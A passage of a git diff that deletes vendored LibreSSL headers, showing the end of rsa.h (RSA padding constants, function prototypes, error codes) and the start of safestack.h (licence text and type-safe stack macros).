-#define EVP_PKEY_CTRL_RSA_KEYGEN_PUBEXP	(EVP_PKEY_ALG_CTRL + 4)
-#define EVP_PKEY_CTRL_RSA_MGF1_MD	(EVP_PKEY_ALG_CTRL + 5)
-
-#define EVP_PKEY_CTRL_GET_RSA_PADDING		(EVP_PKEY_ALG_CTRL + 6)
-#define EVP_PKEY_CTRL_GET_RSA_PSS_SALTLEN	(EVP_PKEY_ALG_CTRL + 7)
-#define EVP_PKEY_CTRL_GET_RSA_MGF1_MD		(EVP_PKEY_ALG_CTRL + 8)
-
-#define RSA_PKCS1_PADDING	1
-#define RSA_SSLV23_PADDING	2
-#define RSA_NO_PADDING		3
-#define RSA_PKCS1_OAEP_PADDING	4
-#define RSA_X931_PADDING	5
-/* EVP_PKEY_ only */
-#define RSA_PKCS1_PSS_PADDING	6
-
-#define RSA_PKCS1_PADDING_SIZE	11
-
-#define RSA_set_app_data(s,arg)         RSA_set_ex_data(s,0,arg)
-#define RSA_get_app_data(s)             RSA_get_ex_data(s,0)
-
-RSA *RSA_new(void);
-RSA *RSA_new_method(ENGINE *engine);
-int RSA_size(const RSA *rsa);
-
-/* Deprecated version */
-#ifndef OPENSSL_NO_DEPRECATED
-RSA *RSA_generate_key(int bits, unsigned long e,
-    void (*callback)(int, int, void *), void *cb_arg);
-#endif /* !defined(OPENSSL_NO_DEPRECATED) */
-
-/* New version */
-int RSA_generate_key_ex(RSA *rsa, int bits, BIGNUM *e, BN_GENCB *cb);
-
-int RSA_check_key(const RSA *);
-/* next 4 return -1 on error */
-int RSA_public_encrypt(int flen, const unsigned char *from,
-    unsigned char *to, RSA *rsa, int padding);
-int RSA_private_encrypt(int flen, const unsigned char *from,
-    unsigned char *to, RSA *rsa, int padding);
-int RSA_public_decrypt(int flen, const unsigned char *from,
-    unsigned char *to, RSA *rsa, int padding);
-int RSA_private_decrypt(int flen, const unsigned char *from,
-    unsigned char *to, RSA *rsa, int padding);
-void RSA_free(RSA *r);
-/* "up" the RSA object's reference count */
-int RSA_up_ref(RSA *r);
-
-int RSA_flags(const RSA *r);
-
-void RSA_set_default_method(const RSA_METHOD *meth);
-const RSA_METHOD *RSA_get_default_method(void);
-const RSA_METHOD *RSA_get_method(const RSA *rsa);
-int RSA_set_method(RSA *rsa, const RSA_METHOD *meth);
-
-/* these are the actual SSLeay RSA functions */
-const RSA_METHOD *RSA_PKCS1_SSLeay(void);
-
-const RSA_METHOD *RSA_null_method(void);
-
-RSA *d2i_RSAPublicKey(RSA **a, const unsigned char **in, long len);
-int i2d_RSAPublicKey(const RSA *a, unsigned char **out);
-extern const ASN1_ITEM RSAPublicKey_it;
-RSA *d2i_RSAPrivateKey(RSA **a, const unsigned char **in, long len);
-int i2d_RSAPrivateKey(const RSA *a, unsigned char **out);
-extern const ASN1_ITEM RSAPrivateKey_it;
-
-typedef struct rsa_pss_params_st {
-	X509_ALGOR *hashAlgorithm;
-	X509_ALGOR *maskGenAlgorithm;
-	ASN1_INTEGER *saltLength;
-	ASN1_INTEGER *trailerField;
-} RSA_PSS_PARAMS;
-
-RSA_PSS_PARAMS *RSA_PSS_PARAMS_new(void);
-void RSA_PSS_PARAMS_free(RSA_PSS_PARAMS *a);
-RSA_PSS_PARAMS *d2i_RSA_PSS_PARAMS(RSA_PSS_PARAMS **a, const unsigned char **in, long len);
-int i2d_RSA_PSS_PARAMS(RSA_PSS_PARAMS *a, unsigned char **out);
-extern const ASN1_ITEM RSA_PSS_PARAMS_it;
-
-int RSA_print_fp(FILE *fp, const RSA *r, int offset);
-
-#ifndef OPENSSL_NO_BIO
-int RSA_print(BIO *bp, const RSA *r, int offset);
-#endif
-
-#ifndef OPENSSL_NO_RC4
-int i2d_RSA_NET(const RSA *a, unsigned char **pp,
-    int (*cb)(char *buf, int len, const char *prompt, int verify), int sgckey);
-RSA *d2i_RSA_NET(RSA **a, const unsigned char **pp, long length,
-    int (*cb)(char *buf, int len, const char *prompt, int verify), int sgckey);
-
-int i2d_Netscape_RSA(const RSA *a, unsigned char **pp,
-    int (*cb)(char *buf, int len, const char *prompt, int verify));
-RSA *d2i_Netscape_RSA(RSA **a, const unsigned char **pp, long length,
-    int (*cb)(char *buf, int len, const char *prompt, int verify));
-#endif
-
-/* The following 2 functions sign and verify a X509_SIG ASN1 object
- * inside PKCS#1 padded RSA encryption */
-int RSA_sign(int type, const unsigned char *m, unsigned int m_length,
-    unsigned char *sigret, unsigned int *siglen, RSA *rsa);
-int RSA_verify(int type, const unsigned char *m, unsigned int m_length,
-    const unsigned char *sigbuf, unsigned int siglen, RSA *rsa);
-
-/* The following 2 function sign and verify a ASN1_OCTET_STRING
- * object inside PKCS#1 padded RSA encryption */
-int RSA_sign_ASN1_OCTET_STRING(int type, const unsigned char *m,
-    unsigned int m_length, unsigned char *sigret, unsigned int *siglen,
-    RSA *rsa);
-int RSA_verify_ASN1_OCTET_STRING(int type, const unsigned char *m,
-    unsigned int m_length, unsigned char *sigbuf, unsigned int siglen,
-    RSA *rsa);
-
-int RSA_blinding_on(RSA *rsa, BN_CTX *ctx);
-void RSA_blinding_off(RSA *rsa);
-BN_BLINDING *RSA_setup_blinding(RSA *rsa, BN_CTX *ctx);
-
-int RSA_padding_add_PKCS1_type_1(unsigned char *to, int tlen,
-    const unsigned char *f, int fl);
-int RSA_padding_check_PKCS1_type_1(unsigned char *to, int tlen,
-    const unsigned char *f, int fl, int rsa_len);
-int RSA_padding_add_PKCS1_type_2(unsigned char *to, int tlen,
-    const unsigned char *f, int fl);
-int RSA_padding_check_PKCS1_type_2(unsigned char *to, int tlen,
-    const unsigned char *f, int fl, int rsa_len);
-int PKCS1_MGF1(unsigned char *mask, long len,
-    const unsigned char *seed, long seedlen, const EVP_MD *dgst);
-int RSA_padding_add_PKCS1_OAEP(unsigned char *to, int tlen,
-    const unsigned char *f, int fl,
-    const unsigned char *p, int pl);
-int RSA_padding_check_PKCS1_OAEP(unsigned char *to, int tlen,
-    const unsigned char *f, int fl, int rsa_len,
-    const unsigned char *p, int pl);
-int RSA_padding_add_none(unsigned char *to, int tlen,
-    const unsigned char *f, int fl);
-int RSA_padding_check_none(unsigned char *to, int tlen,
-    const unsigned char *f, int fl, int rsa_len);
-int RSA_padding_add_X931(unsigned char *to, int tlen,
-    const unsigned char *f, int fl);
-int RSA_padding_check_X931(unsigned char *to, int tlen,
-    const unsigned char *f, int fl, int rsa_len);
-int RSA_X931_hash_id(int nid);
-
-int RSA_verify_PKCS1_PSS(RSA *rsa, const unsigned char *mHash,
-    const EVP_MD *Hash, const unsigned char *EM, int sLen);
-int RSA_padding_add_PKCS1_PSS(RSA *rsa, unsigned char *EM,
-    const unsigned char *mHash, const EVP_MD *Hash, int sLen);
-
-int RSA_verify_PKCS1_PSS_mgf1(RSA *rsa, const unsigned char *mHash,
-    const EVP_MD *Hash, const EVP_MD *mgf1Hash, const unsigned char *EM,
-    int sLen);
-
-int RSA_padding_add_PKCS1_PSS_mgf1(RSA *rsa, unsigned char *EM,
-    const unsigned char *mHash, const EVP_MD *Hash, const EVP_MD *mgf1Hash,
-    int sLen);
-
-int RSA_get_ex_new_index(long argl, void *argp, CRYPTO_EX_new *new_func,
-    CRYPTO_EX_dup *dup_func, CRYPTO_EX_free *free_func);
-int RSA_set_ex_data(RSA *r, int idx, void *arg);
-void *RSA_get_ex_data(const RSA *r, int idx);
-
-RSA *RSAPublicKey_dup(RSA *rsa);
-RSA *RSAPrivateKey_dup(RSA *rsa);
-
-/* If this flag is set the RSA method is FIPS compliant and can be used
- * in FIPS mode. This is set in the validated module method. If an
- * application sets this flag in its own methods it is its responsibility
- * to ensure the result is compliant.
- */
-
-#define RSA_FLAG_FIPS_METHOD			0x0400
-
-/* If this flag is set the operations normally disabled in FIPS mode are
- * permitted it is then the applications responsibility to ensure that the
- * usage is compliant.
- */
-
-#define RSA_FLAG_NON_FIPS_ALLOW			0x0400
-/* Application has decided PRNG is good enough to generate a key: don't
- * check.
- */
-#define RSA_FLAG_CHECKED			0x0800
-
-/* BEGIN ERROR CODES */
-/* The following lines are auto generated by the script mkerr.pl. Any changes
- * made after this point may be overwritten when the script is next run.
- */
-void ERR_load_RSA_strings(void);
-
-/* Error codes for the RSA functions. */
-
-/* Function codes. */
-#define RSA_F_CHECK_PADDING_MD				 140
-#define RSA_F_DO_RSA_PRINT				 146
-#define RSA_F_INT_RSA_VERIFY				 145
-#define RSA_F_MEMORY_LOCK				 100
-#define RSA_F_OLD_RSA_PRIV_DECODE			 147
-#define RSA_F_PKEY_RSA_CTRL				 143
-#define RSA_F_PKEY_RSA_CTRL_STR				 144
-#define RSA_F_PKEY_RSA_SIGN				 142
-#define RSA_F_PKEY_RSA_VERIFY				 154
-#define RSA_F_PKEY_RSA_VERIFYRECOVER			 141
-#define RSA_F_RSA_BUILTIN_KEYGEN			 129
-#define RSA_F_RSA_CHECK_KEY				 123
-#define RSA_F_RSA_EAY_MOD_EXP				 157
-#define RSA_F_RSA_EAY_PRIVATE_DECRYPT			 101
-#define RSA_F_RSA_EAY_PRIVATE_ENCRYPT			 102
-#define RSA_F_RSA_EAY_PUBLIC_DECRYPT			 103
-#define RSA_F_RSA_EAY_PUBLIC_ENCRYPT			 104
-#define RSA_F_RSA_GENERATE_KEY				 105
-#define RSA_F_RSA_GENERATE_KEY_EX			 155
-#define RSA_F_RSA_ITEM_VERIFY				 156
-#define RSA_F_RSA_MEMORY_LOCK				 130
-#define RSA_F_RSA_NEW_METHOD				 106
-#define RSA_F_RSA_NULL					 124
-#define RSA_F_RSA_NULL_MOD_EXP				 131
-#define RSA_F_RSA_NULL_PRIVATE_DECRYPT			 132
-#define RSA_F_RSA_NULL_PRIVATE_ENCRYPT			 133
-#define RSA_F_RSA_NULL_PUBLIC_DECRYPT			 134
-#define RSA_F_RSA_NULL_PUBLIC_ENCRYPT			 135
-#define RSA_F_RSA_PADDING_ADD_NONE			 107
-#define RSA_F_RSA_PADDING_ADD_PKCS1_OAEP		 121
-#define RSA_F_RSA_PADDING_ADD_PKCS1_PSS			 125
-#define RSA_F_RSA_PADDING_ADD_PKCS1_PSS_MGF1		 148
-#define RSA_F_RSA_PADDING_ADD_PKCS1_TYPE_1		 108
-#define RSA_F_RSA_PADDING_ADD_PKCS1_TYPE_2		 109
-#define RSA_F_RSA_PADDING_ADD_X931			 127
-#define RSA_F_RSA_PADDING_CHECK_NONE			 111
-#define RSA_F_RSA_PADDING_CHECK_PKCS1_OAEP		 122
-#define RSA_F_RSA_PADDING_CHECK_PKCS1_TYPE_1		 112
-#define RSA_F_RSA_PADDING_CHECK_PKCS1_TYPE_2		 113
-#define RSA_F_RSA_PADDING_CHECK_X931			 128
-#define RSA_F_RSA_PRINT					 115
-#define RSA_F_RSA_PRINT_FP				 116
-#define RSA_F_RSA_PRIVATE_DECRYPT			 150
-#define RSA_F_RSA_PRIVATE_ENCRYPT			 151
-#define RSA_F_RSA_PRIV_DECODE				 137
-#define RSA_F_RSA_PRIV_ENCODE				 138
-#define RSA_F_RSA_PUBLIC_DECRYPT			 152
-#define RSA_F_RSA_PUBLIC_ENCRYPT			 153
-#define RSA_F_RSA_PUB_DECODE				 139
-#define RSA_F_RSA_SETUP_BLINDING			 136
-#define RSA_F_RSA_SIGN					 117
-#define RSA_F_RSA_SIGN_ASN1_OCTET_STRING		 118
-#define RSA_F_RSA_VERIFY				 119
-#define RSA_F_RSA_VERIFY_ASN1_OCTET_STRING		 120
-#define RSA_F_RSA_VERIFY_PKCS1_PSS			 126
-#define RSA_F_RSA_VERIFY_PKCS1_PSS_MGF1			 149
-
-/* Reason codes. */
-#define RSA_R_ALGORITHM_MISMATCH			 100
-#define RSA_R_BAD_E_VALUE				 101
-#define RSA_R_BAD_FIXED_HEADER_DECRYPT			 102
-#define RSA_R_BAD_PAD_BYTE_COUNT			 103
-#define RSA_R_BAD_SIGNATURE				 104
-#define RSA_R_BLOCK_TYPE_IS_NOT_01			 106
-#define RSA_R_BLOCK_TYPE_IS_NOT_02			 107
-#define RSA_R_DATA_GREATER_THAN_MOD_LEN			 108
-#define RSA_R_DATA_TOO_LARGE				 109
-#define RSA_R_DATA_TOO_LARGE_FOR_KEY_SIZE		 110
-#define RSA_R_DATA_TOO_LARGE_FOR_MODULUS		 132
-#define RSA_R_DATA_TOO_SMALL				 111
-#define RSA_R_DATA_TOO_SMALL_FOR_KEY_SIZE		 122
-#define RSA_R_DIGEST_TOO_BIG_FOR_RSA_KEY		 112
-#define RSA_R_DMP1_NOT_CONGRUENT_TO_D			 124
-#define RSA_R_DMQ1_NOT_CONGRUENT_TO_D			 125
-#define RSA_R_D_E_NOT_CONGRUENT_TO_1			 123
-#define RSA_R_FIRST_OCTET_INVALID			 133
-#define RSA_R_ILLEGAL_OR_UNSUPPORTED_PADDING_MODE	 144
-#define RSA_R_INVALID_DIGEST_LENGTH			 143
-#define RSA_R_INVALID_HEADER				 137
-#define RSA_R_INVALID_KEYBITS				 145
-#define RSA_R_INVALID_MESSAGE_LENGTH			 131
-#define RSA_R_INVALID_MGF1_MD				 156
-#define RSA_R_INVALID_PADDING				 138
-#define RSA_R_INVALID_PADDING_MODE			 141
-#define RSA_R_INVALID_PSS_PARAMETERS			 149
-#define RSA_R_INVALID_PSS_SALTLEN			 146
-#define RSA_R_INVALID_SALT_LENGTH			 150
-#define RSA_R_INVALID_TRAILER				 139
-#define RSA_R_INVALID_X931_DIGEST			 142
-#define RSA_R_IQMP_NOT_INVERSE_OF_Q			 126
-#define RSA_R_KEY_SIZE_TOO_SMALL			 120
-#define RSA_R_LAST_OCTET_INVALID			 134
-#define RSA_R_MODULUS_TOO_LARGE				 105
-#define RSA_R_NON_FIPS_RSA_METHOD			 157
-#define RSA_R_NO_PUBLIC_EXPONENT			 140
-#define RSA_R_NULL_BEFORE_BLOCK_MISSING			 113
-#define RSA_R_N_DOES_NOT_EQUAL_P_Q			 127
-#define RSA_R_OAEP_DECODING_ERROR			 121
-#define RSA_R_OPERATION_NOT_ALLOWED_IN_FIPS_MODE	 158
-#define RSA_R_OPERATION_NOT_SUPPORTED_FOR_THIS_KEYTYPE	 148
-#define RSA_R_PADDING_CHECK_FAILED			 114
-#define RSA_R_P_NOT_PRIME				 128
-#define RSA_R_Q_NOT_PRIME				 129
-#define RSA_R_RSA_OPERATIONS_NOT_SUPPORTED		 130
-#define RSA_R_SLEN_CHECK_FAILED				 136
-#define RSA_R_SLEN_RECOVERY_FAILED			 135
-#define RSA_R_SSLV3_ROLLBACK_ATTACK			 115
-#define RSA_R_THE_ASN1_OBJECT_IDENTIFIER_IS_NOT_KNOWN_FOR_THIS_MD 116
-#define RSA_R_UNKNOWN_ALGORITHM_TYPE			 117
-#define RSA_R_UNKNOWN_MASK_DIGEST			 151
-#define RSA_R_UNKNOWN_PADDING_TYPE			 118
-#define RSA_R_UNKNOWN_PSS_DIGEST			 152
-#define RSA_R_UNSUPPORTED_MASK_ALGORITHM		 153
-#define RSA_R_UNSUPPORTED_MASK_PARAMETER		 154
-#define RSA_R_UNSUPPORTED_SIGNATURE_TYPE		 155
-#define RSA_R_VALUE_MISSING				 147
-#define RSA_R_WRONG_SIGNATURE_LENGTH			 119
-
-#ifdef  __cplusplus
-}
-#endif
-#endif
diff --git a/thirdparty/libressl/include/openssl/safestack.h b/thirdparty/libressl/include/openssl/safestack.h
deleted file mode 100644
index 6540174..0000000
--- a/thirdparty/libressl/include/openssl/safestack.h
+++ /dev/null
@@ -1,2667 +0,0 @@
-/* $OpenBSD: safestack.h,v 1.15 2016/12/27 16:02:40 jsing Exp $ */
-/* ====================================================================
- * Copyright (c) 1999 The OpenSSL Project.  All rights reserved.
- *
- * Redistribution and use in source and binary forms, with or without
- * modification, are permitted provided that the following conditions
- * are met:
- *
- * 1. Redistributions of source code must retain the above copyright
- *    notice, this list of conditions and the following disclaimer. 
- *
- * 2. Redistributions in binary form must reproduce the above copyright
- *    notice, this list of conditions and the following disclaimer in
- *    the documentation and/or other materials provided with the
- *    distribution.
- *
- * 3. All advertising materials mentioning features or use of this
- *    software must display the following acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
- *
- * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
- *    endorse or promote products derived from this software without
- *    prior written permission. For written permission, please contact
- *    openssl-core@openssl.org.
- *
- * 5. Products derived from this software may not be called "OpenSSL"
- *    nor may "OpenSSL" appear in their names without prior written
- *    permission of the OpenSSL Project.
- *
- * 6. Redistributions of any form whatsoever must retain the following
- *    acknowledgment:
- *    "This product includes software developed by the OpenSSL Project
- *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
- *
- * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
- * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
- * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
- * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
- * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
- * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
- * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
- * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
- * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
- * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
- * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
- * OF THE POSSIBILITY OF SUCH DAMAGE.
- * ====================================================================
- *
- * This product includes cryptographic software written by Eric Young
- * (eay@cryptsoft.com).  This product includes software written by Tim
- * Hudson (tjh@cryptsoft.com).
- *
- */
-
-#ifndef HEADER_SAFESTACK_H
-#define HEADER_SAFESTACK_H
-
-#include <openssl/stack.h>
-
-#ifndef CHECKED_PTR_OF
-#define CHECKED_PTR_OF(type, p) \
-    ((void*) (1 ? p : (type*)0))
-#endif
-
-/* In C++ we get problems because an explicit cast is needed from (void *)
- * we use CHECKED_STACK_OF to ensure the correct type is passed in the macros
- * below. 
- */
-
-#define CHECKED_STACK_OF(type, p) \
-    ((_STACK*) (1 ? p : (STACK_OF(type)*)0))
-
-#define CHECKED_SK_FREE_FUNC(type, p) \
-    ((void (*)(void *)) ((1 ? p : (void (*)(type *))0)))
-
-#define CHECKED_SK_FREE_FUNC2(type, p) \
-    ((void (*)(void *)) ((1 ? p : (void (*)(type))0)))
-
-#define CHECKED_SK_CMP_FUNC(type, p) \
-    ((int (*)(const void *, const void *)) \
-	((1 ? p : (int (*)(const type * const *, const type * const *))0)))
-
-#define STACK_OF(type) struct stack_st_##type
-#define PREDECLARE_STACK_OF(type) STACK_OF(type);
-
-#define DECLARE_STACK_OF(type) \
-STACK_OF(type) \
-    { \
-    _STACK stack; \
-    };
-#define DECLARE_SPECIAL_STACK_OF(type, type2) \
-STACK_OF(type) \
-    { \
-    _STACK stack; \
-    };
-
-#define IMPLEMENT_STACK_OF(type) /* nada (obsolete in new safestack approach)*/
-
-
-/* Strings are special: normally an lhash entry will point to a single
- * (somewhat) mutable object. In the case of strings:
- *
- * a) Instead of a single char, there is an array of chars, NUL-terminated.
- * b) The string may have be immutable.
- *
- * So, they need their own declarations. Especially important for
- * type-checking tools, such as Deputy.
- *
-o * In practice, however, it appears to be hard to have a const
- * string. For now, I'm settling for dealing with the fact it is a
- * string at all.
- */
-typedef char *OPENSSL_STRING;
-
-typedef const char *OPENSSL_CSTRING;
-
-/* Confusingly, LHASH_OF(STRING) deals with char ** throughout, but
- * STACK_OF(STRING) is really more like STACK_OF(char), only, as
- * mentioned above, instead of a single char each entry is a
- * NUL-terminated array of chars. So, we have to implement STRING
- * specially for STACK_OF. This is dealt with in the autogenerated
- * macros below.
- */
-
-DECLARE_SPECIAL_STACK_OF(OPENSSL_STRING, char)
-
-/* Similarly, we sometimes use a block of characters, NOT
- * nul-terminated. These should also be distinguished from "normal"
- * stacks. */
-
-typedef void *OPENSSL_BLOCK;
-DECLARE_SPECIAL_STACK_OF(OPENSSL_BLOCK, void)
-
-/* SKM_sk_... stack macros are internal to safestack.h:
- * never use them directly, use sk_<type>_... instead */
-#define SKM_sk_new(type, cmp) \
-	((STACK_OF(type) *)sk_new(CHECKED_SK_CMP_FUNC(type, cmp)))
-#define SKM_sk_new_null(type) \
-	((STACK_OF(type) *)sk_new_null())
-#define SKM_sk_free(type, st) \
-	sk_free(CHECKED_STACK_OF(type, st))
-#define SKM_sk_num(type, st) \
-	sk_num(CHECKED_STACK_OF(type, st))
-#define SKM_sk_value(type, st,i) \
-	((type *)sk_value(CHECKED_STACK_OF(type, st), i))
-#define SKM_sk_set(type, st,i,val) \
-	sk_set(CHECKED_STACK_OF(type, st), i, CHECKED_PTR_OF(type, val))
-#define SKM_sk_zero(type, st) \
-	sk_zero(CHECKED_STACK_OF(type, st))
-#define SKM_sk_push(type, st, val) \
-	sk_push(CHECKED_STACK_OF(type, st), CHECKED_PTR_OF(type, val))
-#define SKM_sk_unshift(type, st, val) \
-	sk_unshift(CHECKED_STACK_OF(type, st), CHECKED_PTR_OF(type, val))
-#define SKM_sk_find(type, st, val) \
-	sk_find(CHECKED_STACK_OF(type, st), CHECKED_PTR_OF(type, val))
-#define SKM_sk_find_ex(type, st, val) \
-	sk_find_ex(CHECKED_STACK_OF(type, st), \
-		   CHECKED_PTR_OF(type, val))
-#define SKM_sk_delete(type, st, i) \
-	(type *)sk_delete(CHECKED_STACK_OF(type, st), i)
-#define SKM_sk_delete_ptr(type, st, ptr) \
-	(type *)sk_delete_ptr(CHECKED_STACK_OF(type, st), CHECKED_PTR_OF(type, ptr))
-#define SKM_sk_insert(type, st,val, i) \
-	sk_insert(CHECKED_STACK_OF(type, st), CHECKED_PTR_OF(type, val), i)
-#define SKM_sk_set_cmp_func(type, st, cmp) \
-	((int (*)(const type * const *,const type * const *)) \
-	sk_set_cmp_func(CHECKED_STACK_OF(type, st), CHECKED_SK_CMP_FUNC(type, cmp)))
-#define SKM_sk_dup(type, st) \
-	(STACK_OF(type) *)sk_dup(CHECKED_STACK_OF(type, st))
-#define SKM_sk_pop_free(type, st, free_func) \
-	sk_pop_free(CHECKED_STACK_OF(type, st), CHECKED_SK_FREE_FUNC(type, free_func))
-#define SKM_sk_shift(type, st) \
-	(type *)sk_shift(CHECKED_STACK_OF(type, st))
-#define SKM_sk_pop(type, st) \
-	(type *)sk_pop(CHECKED_STACK_OF(type, st))
-#define SKM_sk_sort(type, st) \
-	sk_sort(CHECKED_STACK_OF(type, st))
-#define SKM_sk_is_sorted(type, st) \
-	sk_is_sorted(CHECKED_STACK_OF(type, st))
-
-#ifndef LIBRESSL_INTERNAL
-#define	SKM_ASN1_SET_OF_d2i(type, st, pp, length, d2i_func, free_func, ex_tag, ex_class) \
-  (STACK_OF(type) *)d2i_ASN1_SET( \
-				(STACK_OF(OPENSSL_BLOCK) **)CHECKED_PTR_OF(STACK_OF(type)*, st), \
-				pp, length, \
-				CHECKED_D2I_OF(type, d2i_func), \
-				CHECKED_SK_FREE_FUNC(type, free_func), \
-				ex_tag, ex_class)
-
-#define	SKM_ASN1_SET_OF_i2d(type, st, pp, i2d_func, ex_tag, ex_class, is_set) \
-  i2d_ASN1_SET((STACK_OF(OPENSSL_BLOCK) *)CHECKED_STACK_OF(type, st), pp, \
-				CHECKED_I2D_OF(type, i2d_func), \
-				ex_tag, ex_class, is_set)
-
-#define	SKM_ASN1_seq_pack(type, st, i2d_func, buf, len) \
-	ASN1_seq_pack(CHECKED_PTR_OF(STACK_OF(type), st), \
-			CHECKED_I2D_OF(type, i2d_func), buf, len)
-
-#define	SKM_ASN1_seq_unpack(type, buf, len, d2i_func, free_func) \
-	(STACK_OF(type) *)ASN1_seq_unpack(buf, len, CHECKED_D2I_OF(type, d2i_func), CHECKED_SK_FREE_FUNC(type, free_func))
-
-#define SKM_PKCS12_decrypt_d2i(type, algor, d2i_func, free_func, pass, passlen, oct, seq) \
-	(STACK_OF(type) *)PKCS12_decrypt_d2i(algor, \
-				CHECKED_D2I_OF(type, d2i_func), \
-				CHECKED_SK_FREE_FUNC(type, free_func), \
-				pass, passlen, oct, seq)
-#endif
-
-/* This block of defines is updated by util/mkstack.pl, please do not touch! */
-#define sk_ACCESS_DESCRIPTION_new(cmp) SKM_sk_new(ACCESS_DESCRIPTION, (cmp))
-#define sk_ACCESS_DESCRIPTION_new_null() SKM_sk_new_null(ACCESS_DESCRIPTION)
-#define sk_ACCESS_DESCRIPTION_free(st) SKM_sk_free(ACCESS_DESCRIPTION, (st))
-#define sk_ACCESS_DESCRIPTION_num(st) SKM_sk_num(ACCESS_DESCRIPTION, (st))
-#define sk_ACCESS_DESCRIPTION_value(st, i) SKM_sk_value(ACCESS_DESCRIPTION, (st), (i))
-#define sk_ACCESS_DESCRIPTION_set(st, i, val) SKM_sk_set(ACCESS_DESCRIPTION, (st), (i), (val))
-#define sk_ACCESS_DESCRIPTION_zero(st) SKM_sk_zero(ACCESS_DESCRIPTION, (st))
-#define sk_ACCESS_DESCRIPTION_push(st, val) SKM_sk_push(ACCESS_DESCRIPTION, (st), (val))
-#define sk_ACCESS_DESCRIPTION_unshift(st, val) SKM_sk_unshift(ACCESS_DESCRIPTION, (st), (val))
-#define sk_ACCESS_DESCRIPTION_find(st, val) SKM_sk_find(ACCESS_DESCRIPTION, (st), (val))
-#define sk_ACCESS_DESCRIPTION_find_ex(st, val) SKM_sk_find_ex(ACCESS_DESCRIPTION, (st), (val))
-#define sk_ACCESS_DESCRIPTION_delete(st, i) SKM_sk_delete(ACCESS_DESCRIPTION, (st), (i))
-#define sk_ACCESS_DESCRIPTION_delete_ptr(st, ptr) SKM_sk_delete_ptr(ACCESS_DESCRIPTION, (st), (ptr))
-#define sk_ACCESS_DESCRIPTION_insert(st, val, i) SKM_sk_insert(ACCESS_DESCRIPTION, (st), (val), (i))
-#define sk_ACCESS_DESCRIPTION_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(ACCESS_DESCRIPTION, (st), (cmp))
-#define sk_ACCESS_DESCRIPTION_dup(st) SKM_sk_dup(ACCESS_DESCRIPTION, st)
-#define sk_ACCESS_DESCRIPTION_pop_free(st, free_func) SKM_sk_pop_free(ACCESS_DESCRIPTION, (st), (free_func))
-#define sk_ACCESS_DESCRIPTION_shift(st) SKM_sk_shift(ACCESS_DESCRIPTION, (st))
-#define sk_ACCESS_DESCRIPTION_pop(st) SKM_sk_pop(ACCESS_DESCRIPTION, (st))
-#define sk_ACCESS_DESCRIPTION_sort(st) SKM_sk_sort(ACCESS_DESCRIPTION, (st))
-#define sk_ACCESS_DESCRIPTION_is_sorted(st) SKM_sk_is_sorted(ACCESS_DESCRIPTION, (st))
-
-#define sk_ASIdOrRange_new(cmp) SKM_sk_new(ASIdOrRange, (cmp))
-#define sk_ASIdOrRange_new_null() SKM_sk_new_null(ASIdOrRange)
-#define sk_ASIdOrRange_free(st) SKM_sk_free(ASIdOrRange, (st))
-#define sk_ASIdOrRange_num(st) SKM_sk_num(ASIdOrRange, (st))
-#define sk_ASIdOrRange_value(st, i) SKM_sk_value(ASIdOrRange, (st), (i))
-#define sk_ASIdOrRange_set(st, i, val) SKM_sk_set(ASIdOrRange, (st), (i), (val))
-#define sk_ASIdOrRange_zero(st) SKM_sk_zero(ASIdOrRange, (st))
-#define sk_ASIdOrRange_push(st, val) SKM_sk_push(ASIdOrRange, (st), (val))
-#define sk_ASIdOrRange_unshift(st, val) SKM_sk_unshift(ASIdOrRange, (st), (val))
-#define sk_ASIdOrRange_find(st, val) SKM_sk_find(ASIdOrRange, (st), (val))
-#define sk_ASIdOrRange_find_ex(st, val) SKM_sk_find_ex(ASIdOrRange, (st), (val))
-#define sk_ASIdOrRange_delete(st, i) SKM_sk_delete(ASIdOrRange, (st), (i))
-#define sk_ASIdOrRange_delete_ptr(st, ptr) SKM_sk_delete_ptr(ASIdOrRange, (st), (ptr))
-#define sk_ASIdOrRange_insert(st, val, i) SKM_sk_insert(ASIdOrRange, (st), (val), (i))
-#define sk_ASIdOrRange_set_cmp_func(st, cmp) SKM_sk_set_cmp_func(ASIdOrRange, (st), (cmp))
-#define sk_ASIdOrRange_dup(st) SKM_sk_dup(ASIdOrRange, st)
-#define sk_ASIdOrRange_pop_free(st, free_func) SKM_sk_pop_free(ASIdOrRange, (st), (free_func))
-#define sk_ASIdOrRange_shift(st) SKM_sk_shift(ASIdOrRange, (st))
-#define sk_ASIdOrRange_pop(st) SKM_sk_pop(ASIdOrRange, (st))
-#define sk_ASIdOrRange_sort(st) SKM_sk_sort(ASIdOrRange, (st))
-#define sk_ASIdOrRange_is_sorted(st) SKM_sk_is_sorted(ASIdOrRange, (st))
-
-#define sk_ASN1_GENERALSTRING_new(cmp) SKM_sk_new(ASN1_GENERALSTRING, (cmp))
-#define sk_ASN1_GENERALSTRING_new_null() SKM_sk_new_null(ASN1_GENERALSTRING)
-#define sk_ASN1_GENERALSTRING_free(st) SKM_sk_free(ASN1_GENERALSTRING, (st))
-#define sk_ASN1_GENERALSTRING_num(st) SKM_sk_num(ASN1_GENERALSTRING, (st))
-#define sk_ASN1_GENERALSTRING_value(st, i) SKM_sk_value(ASN1_GENERALSTRING, (st), (i))
-#define sk_ASN1_GENERALSTRING_set(st, i, val) SKM_sk_set(ASN1_GENERALSTRING, (st), (i), (val))
-#define sk_ASN1_GENERALSTRING_zero(st) SKM_sk_zero(ASN1_GENERALSTRING, (st))
